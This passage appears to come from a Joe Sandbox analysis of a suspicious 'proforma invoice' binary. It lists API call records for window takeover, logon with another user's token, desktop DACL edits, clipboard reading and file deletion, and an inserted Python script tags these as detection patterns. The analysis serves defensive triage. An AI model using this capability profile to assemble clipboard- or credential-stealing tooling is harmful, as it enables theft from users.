                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF4F6
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF501
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF50B
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF510
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF519
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF51E
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF528
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF52D
                  • SetForegroundWindow.USER32(00000000), ref: 00AFF530
                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00AFF557
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                  • String ID: Shell_TrayWnd
                  • API String ID: 4125248594-2988720461
                  • Opcode ID: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
                  • Instruction ID: 1f49d933e0855748c16b2053f64349c035ccdba996537f1d856b694d5e4f887f
                  • Opcode Fuzzy Hash: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
                  • Instruction Fuzzy Hash: 09310E71A80218BEEB216BF55C4AFBF7E6CEB44B50F210065FA01F7191CBB19D00AB60
                  APIs
                    • Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                    • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                    • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B01286
                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B012A8
                  • CloseHandle.KERNEL32(?), ref: 00B012B9
                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B012D1
                  • GetProcessWindowStation.USER32 ref: 00B012EA
                  • SetProcessWindowStation.USER32(00000000), ref: 00B012F4
                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B01310
                    • Part of subcall function 00B010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
                    • Part of subcall function 00B010BF: CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                  • String ID: $default$winsta0
                  • API String ID: 22674027-1027155976
                  • Opcode ID: 17cb2110982dc51862098ff6fb362006e160314a87a0bca3f37a9ed3d6136a92
                  • Instruction ID: 4ff99b4ba39a1565f44688b0a8d81fdc6e7f27989c8a3761d65021250e61f383
                  • Opcode Fuzzy Hash: 17cb2110982dc51862098ff6fb362006e160314a87a0bca3f37a9ed3d6136a92
                  • Instruction Fuzzy Hash: 0F817871900209AFDF259FA8DC49BEE7FB9EF04704F2445A9F910B62A0DB758954CF20
                  APIs
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                    • Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                    • Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                    • Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00BCC
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00C00
                  • GetLengthSid.ADVAPI32(?), ref: 00B00C17
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B00C51
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00C6D
                  • GetLengthSid.ADVAPI32(?), ref: 00B00C84
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00C8C
                  • HeapAlloc.KERNEL32(00000000), ref: 00B00C93
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00CB4
                  • CopySid.ADVAPI32(00000000), ref: 00B00CBB
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00CEA
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00D0C
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00D1E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D45
                  • HeapFree.KERNEL32(00000000), ref: 00B00D4C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D55
                  • HeapFree.KERNEL32(00000000), ref: 00B00D5C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D65
                  • HeapFree.KERNEL32(00000000), ref: 00B00D6C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B00D78
                  • HeapFree.KERNEL32(00000000), ref: 00B00D7F
                    • Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
                    • Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
                    • Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
                  • Instruction ID: 4d50d429bfe5d848da772d6910756e32481216c547c2c76bedaa8a53be175eac
                  • Opcode Fuzzy Hash: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
                  • Instruction Fuzzy Hash: 3071397690020AABDF10AFE4DC44BAEBFB9FF04310F2446A5E915B7191DB75AA05CB70
                  APIs
                  • OpenClipboard.USER32(00B3CC08), ref: 00B1EB29
                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B1EB37
                  • GetClipboardData.USER32(0000000D), ref: 00B1EB43
                  • CloseClipboard.USER32 ref: 00B1EB4F
                  • GlobalLock.KERNEL32(00000000), ref: 00B1EB87
                  • CloseClipboard.USER32 ref: 00B1EB91
                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B1EBBC
                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00B1EBC9
                  • GetClipboardData.USER32(00000001), ref: 00B1EBD1
                  • GlobalLock.KERNEL32(00000000), ref: 00B1EBE2
                  • GlobalUnlock.KERNEL32(00000000,?), ref: 00B1EC22
                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B1EC38
                  • GetClipboardData.USER32(0000000F), ref: 00B1EC44
                  • GlobalLock.KERNEL32(00000000), ref: 00B1EC55
                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B1EC77
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1EC94
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1ECD2
                  • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00B1ECF3
                  • CountClipboardFormats.USER32 ref: 00B1ED14
                  • CloseClipboard.USER32 ref: 00B1ED59
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                  • String ID:
                  • API String ID: 420908878-0
                  • Opcode ID: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
                  • Instruction ID: aef3357d39cd8f425e6bee8d968c6ef45379f779a1ad51d8b5c1c0a631f8285f
                  • Opcode Fuzzy Hash: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
                  • Instruction Fuzzy Hash: F561D1352042019FD300EF64D889FAABBE4EF85714F58459DF866972A1CF31DD89CB62
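                  The three records above for the routines at 00AFF474 (FindWindowW on Shell_TrayWnd, AttachThreadInput, keybd_event with key 0x12, SetForegroundWindow), 00B01286 (LogonUserW, DuplicateTokenEx, OpenWindowStationW on winsta0, OpenDesktopW on default) and 00B1EB29 (OpenClipboard, GetClipboardData for formats 0xD, 0x1 and 0xF) are quicker to triage once the listing is parsed rather than read line by line. The Python below is an added example by the editor, not part of the Joe Sandbox report or of the analysed sample: it parses the report's bullet syntax (including the "Part of subcall function" lines) into call records and tags the API sets named above, plus the DACL-editing set from the record at 00B00BCC. The tag names, the reading of these routines as the AutoIt runtime's WinActivate / RunAs / ClipGet built-ins, and the sample records (subsets of the listings above, copied verbatim) are the editor's assumptions. A tag means the capability is compiled into the binary; if this is a compiled AutoIt script, as the signature section suggests, the runtime carries these routines whatever the script does, so a hit is a triage hint, not evidence that the behaviour ran in this analysis.

```python
# Added example: parse Joe Sandbox "APIs" listings and tag what each function record implies.
import re
from dataclasses import dataclass
from typing import Optional

# One bullet of an "APIs" listing. Three shapes occur in the report:
#   • AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4CE
#   • GetCurrentThreadId.KERNEL32 ref: 00AFF4B1                  (no argument list)
#   • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                 # raw argument strings; '?' is an argument the sandbox could not resolve
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when the report marks the line as a subcall

def _hex_arg(arg: str) -> Optional[int]:
    """Decode a hex argument; '?' and string arguments such as winsta0 give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def parse_api_lines(text: str) -> list:
    """Return the ApiCall entries in text; lines that are not API bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") is not None else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

# A tag fires when every API in its set appears in one function record. Reading these as the
# AutoIt runtime's WinActivate / RunAs / ClipGet built-ins is the analyst's attribution, and a
# hit means "capability compiled in", not "behaviour observed in this run".
PATTERNS = {
    "foreground-window takeover": {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "logon as another user with desktop access":
        {"LogonUserW", "DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    "window-station/desktop DACL modification":
        {"GetSecurityDescriptorDacl", "AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"},
    "clipboard read": {"OpenClipboard", "GetClipboardData"},
}
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}
VK_MENU = 0x12  # Alt; a synthetic Alt press is the usual way past SetForegroundWindow's lock

def classify(calls: list):
    """Return (tags, details) for the calls of one function record."""
    names = {c.api for c in calls}
    tags = [tag for tag, needed in PATTERNS.items() if needed <= names]
    details = {}
    fmts = sorted({_hex_arg(c.args[0]) for c in calls
                   if c.api == "GetClipboardData" and c.args and _hex_arg(c.args[0]) is not None})
    if fmts:
        details["clipboard_formats"] = [CLIPBOARD_FORMATS.get(f, hex(f)) for f in fmts]
    if any(c.api == "keybd_event" and c.args and _hex_arg(c.args[0]) == VK_MENU for c in calls):
        details["keybd_event_key"] = "VK_MENU (Alt)"
    return tags, details

# Constructed samples: a subset of the lines of three records above, copied verbatim.
FOREGROUND_RECORD = """
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AFF474
• GetCurrentThreadId.KERNEL32 ref: 00AFF4B1
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4CE
• SetForegroundWindow.USER32(00000000), ref: 00AFF4E1
• keybd_event.USER32(00000012,00000000), ref: 00AFF501
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 00AFF557
"""
LOGON_RECORD = """
  • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B01286
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B012A8
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B012D1
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B01310
"""
CLIPBOARD_RECORD = """
• OpenClipboard.USER32(00B3CC08), ref: 00B1EB29
• GetClipboardData.USER32(0000000D), ref: 00B1EB43
• GetClipboardData.USER32(00000001), ref: 00B1EBD1
• GetClipboardData.USER32(0000000F), ref: 00B1EC44
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B1EC77
• CloseClipboard.USER32 ref: 00B1ED59
"""

if __name__ == "__main__":
    for rec in (FOREGROUND_RECORD, LOGON_RECORD, CLIPBOARD_RECORD):
        print(classify(parse_api_lines(rec)))
```

                  Paste a whole "APIs" block from the report into parse_api_lines and classify the result; records whose only calls are Sleep, as for the two functions in the non-image-backed 02100000 region above, produce no tag, which is the intended outcome for a filter meant to point an analyst at the few records worth opening in the disassembler.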
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B169BE
                  • FindClose.KERNEL32(00000000), ref: 00B16A12
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A4E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A75
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16AB2
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16ADF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                  • API String ID: 3830820486-3289030164
                  • Opcode ID: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
                  • Instruction ID: 6f37de1d9cea6084673464be9431da94fbdbb62cb53a7e6ab5c1ebcc03f0c958
                  • Opcode Fuzzy Hash: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
                  • Instruction Fuzzy Hash: 19D14D72508300AEC714EBA4CD82EAFB7ECAF89704F44495DF589D7191EB74DA44CB62
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B19663
                  • GetFileAttributesW.KERNEL32(?), ref: 00B196A1
                  • SetFileAttributesW.KERNEL32(?,?), ref: 00B196BB
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B196D3
                  • FindClose.KERNEL32(00000000), ref: 00B196DE
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B196FA
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B1974A
                  • SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B19768
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B19772
                  • FindClose.KERNEL32(00000000), ref: 00B1977F
                  • FindClose.KERNEL32(00000000), ref: 00B1978F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                  • String ID: *.*
                  • API String ID: 1409584000-438819550
                  • Opcode ID: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
                  • Instruction ID: 135f7a577104f8ffb9f046c5d5a9a671983129dfddc80e4c17a180d43697f195
                  • Opcode Fuzzy Hash: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
                  • Instruction Fuzzy Hash: D331A032540259AADB14AFF4DC59ADE7BECEF09320F644195F815E30E0DB34DE848B64
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B197BE
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B19819
                  • FindClose.KERNEL32(00000000), ref: 00B19824
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B19840
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B19890
                  • SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B198AE
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B198B8
                  • FindClose.KERNEL32(00000000), ref: 00B198C5
                  • FindClose.KERNEL32(00000000), ref: 00B198D5
                    • Part of subcall function 00B0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B0DB00
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                  • String ID: *.*
                  • API String ID: 2640511053-438819550
                  • Opcode ID: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
                  • Instruction ID: 6aacb86cff4e30b42c572f21aac517bd0d4ac6255e11674fe6e76f47f62a1053
                  • Opcode Fuzzy Hash: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
                  • Instruction Fuzzy Hash: 0A31B232540659AADB14AFB4DC59ADE7BECEF06360F6441A5F814A30E0DB30D9858B64
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 00B18257
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B18267
                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B18273
                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B18310
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18324
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18356
                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B1838C
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B18395
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryTime$File$Local$System
                  • String ID: *.*
                  • API String ID: 1464919966-438819550
                  • Opcode ID: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
                  • Instruction ID: fcdd8be76debd1d10b72597b7a4f3a211f0e307830f744f09ccb6ad029fbacf2
                  • Opcode Fuzzy Hash: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
                  • Instruction Fuzzy Hash: 86618A725043059FCB10EF60D8809AFB3E8FF8A310F44896EF99993291DB31E945CB92
                  APIs
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                    • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B0D122
                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B0D1DD
                  • MoveFileW.KERNEL32(?,?), ref: 00B0D1F0
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D20D
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D237
                    • Part of subcall function 00B0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B0D21C,?,?), ref: 00B0D2B2
                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00B0D253
                  • FindClose.KERNEL32(00000000), ref: 00B0D264
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                  • String ID: \*.*
                  • API String ID: 1946585618-1173974218
                  • Opcode ID: 2bbea67a55e2784600a09b85aeebec43d971aebcb136ccb48c0a0219384da78e
                  • Instruction ID: 69fb2ef38cf13303d775503ceca7154d498df672a156bcd580c5911a42113a5a
                  • Opcode Fuzzy Hash: 2bbea67a55e2784600a09b85aeebec43d971aebcb136ccb48c0a0219384da78e
                  • Instruction Fuzzy Hash: 97615C3180111DAECF05EBE0DA929EEBBB5AF55340F2481A9E406771D1EF35AF09CB61
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                  • String ID:
                  • API String ID: 1737998785-0
                  • Opcode ID: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
                  • Instruction ID: 1fd8fddc1864ee0a993a603d90cdaf1eaf3c8d7c01e13091c1d4a12c7fcc8a44
                  • Opcode Fuzzy Hash: 6990be5bf4f3f99e583d1407a4aa186fd49b62f81c91f0cd3d757dc8621bb4be
                  • Instruction Fuzzy Hash: C241B435204611AFE310DF59D889F59BBE1FF44318F54C099E8259B6A2CB35EC81CB90
                  APIs
                    • Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                    • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                    • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
                  • ExitWindowsEx.USER32(?,00000000), ref: 00B0E932
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
